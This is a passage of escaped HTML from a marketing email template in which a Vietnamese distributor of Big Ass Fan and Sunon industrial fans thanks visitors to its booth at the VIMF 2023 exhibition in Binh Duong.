<\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;\\\">\\r\\n        <tr>\\r\\n          <td background=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\\\" valign=\\\"top\\\" width=\\\"100%\\\">\\r\\n      <v:rect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" fill=\\\"true\\\" stroke=\\\"false\\\" style=\\\"width: 600px;\\\">\\r\\n        <v:fill type=\\\"frame\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\\\" \\/><v:textbox style=\\\"mso-fit-shape-to-text:true\\\" inset=\\\"0,0,0,0\\\">\\r\\n      <![endif]-->\\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #040505\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #040505;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:80px 10px 15px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: inherit; font-size: 14px; font-weight: 400; color: #ecf0f1; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px;\\\"><strong>VIMF 2023<\\/strong><\\/span><\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\">Tri\\u1ec3n L\\u00e3m Qu\\u1ed1c T\\u1ebf Chuy\\u00ean Ngh\\u00e0nh V\\u1ec1 M\\u00e1y M\\u00f3c Thi\\u1ebft B\\u1ecb, Dung C\\u1ee5 V\\u1eadt Li\\u1ec7u, C\\u00f4ng Ngh\\u1ec7 K\\u1ef9 Thu\\u1eadt \\u1ee8ng D\\u1ee5ng Cho Ngh\\u00e0nh C\\u00f4ng Nghi\\u1ec7p S\\u1ea3n Xu\\u1ea5t.<\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u25b9\\u25b9\\u25b9<\\/span>Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t <span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u25b9\\u25b9\\u25b9 -\\u00a0<\\/span><\\/span><\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 10px; line-height: 14px;\\\">MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 30px 80px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><table border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\"><tr><td align=\\\"center\\\" bgcolor=\\\"#ffffff\\\" style=\\\"padding:10px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #c97a14; background-color: #ffffff; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <\\/v:textbox><\\/v:rect>\\r\\n    <\\/td>\\r\\n    <\\/tr>\\r\\n    <\\/table>\\r\\n    <![endif]-->\\r\\n    \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #e67e23\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #e67e23;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #236fa1; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: Lato, sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>HAMILTON AIR<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_18\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #236fa1; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 30px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #a5a5a5; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u2705<\\/span> MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/p>\\r\\n<p class=\\\"p2\\\" style=\\\"line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">L\\u00e0m cho kh\\u00f4ng gian c\\u1ee7a b\\u1ea1n hi\\u1ec7u qu\\u1ea3 h\\u01a1n v\\u1edbi d\\u00f2ng s\\u1ea3n ph\\u1ea9m lu\\u1ed3ng kh\\u00f4ng kh\\u00ed hi\\u1ec7u qu\\u1ea3 cao.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f <span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\">First of all, Tổ chức đào tạo WIT Company would like to thank\\u00a0you for visiting our booth number 126 at VMIF Exhibition and Trademark in Binh Duong in 2023.<\\/span><\\/p>\\r\\n<div style=\\\"color: #222222; white-space: normal; background-color: #ffffff;\\\">Tổ chức đào tạo WIT Company is the exclusive distributor for 2 brands Big Ass Fan and Sunon in the Vietnam market. We specialize in providing industrial fans for Factories, Apartments, Villas and Resorts.<\\/div>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f Whether you have an industrial complex or a small shop, our airflow experts are here to make your life easier, more comfortable, and less expensive.<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u2622\\ufe0f\\u00a0 Bring comfort and better experience for your home or business.<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">-------o0o-------<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span>\\u00a0 L\\u1eddi \\u0111\\u1ea7u ti\\u00ean, C\\u00f4ng ty C\\u1ed5 Ph\\u1ea7n Tổ chức đào tạo WIT xin c\\u1ea3m \\u01a1n qu\\u00fd kh\\u00e1ch \\u0111\\u00e3 gh\\u00e9 th\\u0103m gian h\\u00e0ng s\\u1ed1 126 c\\u1ee7a ch\\u00fang t\\u00f4i t\\u1ea1i Tri\\u1ec3n l\\u00e3m v\\u00e0 Th\\u01b0\\u01a1ng hi\\u1ec7u VMIF t\\u1ea1i B\\u00ecnh D\\u01b0\\u01a1ng n\\u0103m 2023.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span>\\u00a0 C\\u00f4ng ty Tổ chức đào tạo WIT l\\u00e0 nh\\u00e0 ph\\u00e2n ph\\u1ed1i u\\u1ef7 quy\\u1ec1n cho 2 th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t l\\u00e0m m\\u00e1t <strong>Big Ass Fan<\\/strong> v\\u00e0 <strong>Sunon<\\/strong> t\\u1ea1i th\\u1ecb tr\\u01b0\\u1eddng Vi\\u1ec7t Nam. Ch\\u00fang t\\u00f4i chuy\\u00ean cung c\\u1ea5p c\\u00e1c lo\\u1ea1i qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p cho Nh\\u00e0 m\\u00e1y, Chung c\\u01b0, Bi\\u1ec7t th\\u1ef1, Resort...<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span> Cho d\\u00f9 b\\u1ea1n c\\u00f3 m\\u1ed9t khu li\\u00ean h\\u1ee3p c\\u00f4ng nghi\\u1ec7p hay m\\u1ed9t c\\u1eeda h\\u00e0ng nh\\u1ecf, c\\u00e1c chuy\\u00ean gia v\\u1ec1 lu\\u1ed3ng kh\\u00f4ng kh\\u00ed c\\u1ee7a ch\\u00fang t\\u00f4i lu\\u00f4n s\\u1eb5n s\\u00e0ng gi\\u00fap cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n d\\u1ec5 d\\u00e0ng h\\u01a1n, tho\\u1ea3i m\\u00e1i h\\u01a1n v\\u00e0 \\u00edt t\\u1ed1n k\\u00e9m h\\u01a1n.<\\/span><\\/p>\\r\\n<p style=\\\"color: #222222; white-space: normal; background-color: #ffffff; margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\"><span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u2705<\\/span> <\\/span>Mang l\\u1ea1i s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u00e0 tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho ng\\u00f4i nh\\u00e0 ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 